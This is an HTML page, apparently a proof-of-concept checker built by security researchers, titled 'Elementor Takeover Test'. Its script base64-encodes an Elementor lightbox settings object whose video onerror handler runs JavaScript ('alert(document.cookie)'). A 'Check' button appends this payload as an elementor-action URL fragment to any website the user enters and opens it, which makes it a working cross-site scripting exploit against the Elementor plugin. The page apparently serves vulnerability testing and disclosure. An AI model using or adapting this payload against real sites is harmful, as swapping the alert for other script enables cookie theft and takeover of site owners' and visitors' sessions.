
<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8"/>
    <meta name="viewport"
          content="width=device-width,
        initial-scale=1"/>

    <!-- Bootstrap CSS -->
    <link
            href=
                    "https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity=
                    "sha384-BmbxuPwQa2lc/FVzBcNJ7UAyJxM6wuqIj61tLrc4wSX0szH/Ev+nYRRuWlolflfl"
            crossorigin="anonymous"
    />
    <link rel="stylesheet"
          href="style.css"/>
    <link rel="preconnect"
          href="https://fonts.gstatic.com"/>
    <link
            href=
                    "https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap"
            rel="stylesheet"
    />
    <style>
        * {
            background-color: #0a193d;
            margin: 0;
            padding: 0;
            font-family: 'Roboto Condensed', sans-serif;
        }

        /* navbar */

        .navbar-nav {
            margin-right: 0 !important;
            padding-right: 100px;
        }

        .navbar {
            background-color: #0a193d;
            color: white !important;
        }

        .nav-item a {
            color: white !important;
        }

        .nav-item {
            padding-left: 2px;
        }

        .navbar-brand {
            color: white !important;
            padding-left: 100px;
        }

        #navbar button {
            color: white !important;
        }

        /* banner */

        #banner-container {
            background-color: #0a193d;
            color: white !important;
            padding-top: 40px;

        }

        #banner-row img {
            max-width: 70%;
            height: auto;
            display: block;
            padding-left: 30px;
        }

        #banner-row h3, p {
            padding-left: 20px;
            padding-top: 20px;
            text-align: center;
        }

        #banner-row a {
            background-color: white !important;
            color: black !important;
            border: none;
            margin-left: 20px;
            margin-top: 20px;

        }

        #banner-col {
            padding-left: 20px;
        }

        /* service */
        #service {
            padding-top: 80px;
            padding-bottom: 80px;
        }

        #service h1 {
            padding-bottom: 70px;
        }


        /* footer */

        .mb-3 {
            padding-top: 10px;
        }


        /* media */
        @media only screen and (max-width: 987px) {
            .navbar-brand {
                padding-left: 0px;
            }
        }

        @media only screen and (max-width: 768px) {
            #banner-row img {
                padding-top: 20px;
            }

            .social-col {
                width: 33%;
            }

        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
    <script type="text/javascript">
        const jspayload = "alert(document.cookie)";
        const base64 = btoa(JSON.stringify({
            "type": "video",
            "url": "http://",
            "videoType": "hosted",
            "videoParams": {
                "onerror": jspayload,
                "style": "    background-color: white;" +
                    "background-image: url(https://www.hackerone.com/sites/default/files/inline-images/_DSC6749_0.jpg);" +
                    "background-size: contain;"
            }
        }))

        const payload = '/#elementor-action:action=lightbox&settings=' + base64;

        $(function () {
            $("#website").val(location.hash.substr(1))
        });

        function checkSite() {

            let url = $("#website").val();
            if (!/^https?:\/\//i.test(url)) {
                url = 'https://' + url;
            }
            url = url + payload;

            window.open(url, '_blank');
        }
    </script>

    <title>mirroring: Elementor Takeover Test</title>
</head>
<body>
<section id="navbar">
    <nav class="navbar navbar-expand-lg navbar-light">
        <div class="container-fluid" style="justify-content: center">
            <a class="navbar-brand" href="#">
                All your Elementor are belong to us
            </a>

    </nav>
</section>

<!-- banner -->
<section id="banner">
    <div class="container-fluid" id="banner-container">
        <div class="row" id="banner-row">
            <div class="col-md-12" id="banner-col">
                <div class="input-group mb-3">
                    <div class="input-group-prepend">
                        <span class="input-group-text">Website</span>
                    </div>
                    <input type="text" class="form-control" placeholder="website" aria-label="website"
                           aria-describedby="basic-addon1" id="website"/>
                    <button onclick="checkSite()" type="button" class="btn btn-danger">Check</button>
                </div>
            </div>
        </div>
    </div>
</section>


<!-- footer -->
<section id="footer">
    <section id="banner">
        <div class="container-fluid" id="banner-container">
            <div class="row" id="banner-row">
                <div class="col-md-12" id="footer-col1">
                    <h3 style="text-decoration: underline;">Brought to you by</h3>

                    <p>
                        Rotem Bar - @Cider Security
                    </p>
                    <p>
                        Tomer Zait - @F5
                    </p>
                    <p>
                        Gal Nagli - @Salesforce
                    </p>


                </div>

            </div>
    </section>
</section>

<!-- Optional JavaScript; choose one of the two! -->

<!-- Option 1: Bootstrap Bundle with Popper -->
<script
        src=
                "https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/js/bootstrap.bundle.min.js"
        integrity=
                "sha384-b5kHyXgcpbZJO/tY9Ul7kGkf1S0CWuKcCD38l8YkeH8z8QjE0GmW1gYU5S9FOnJ0"
        crossorigin="anonymous"
></script>
</body>
</html>
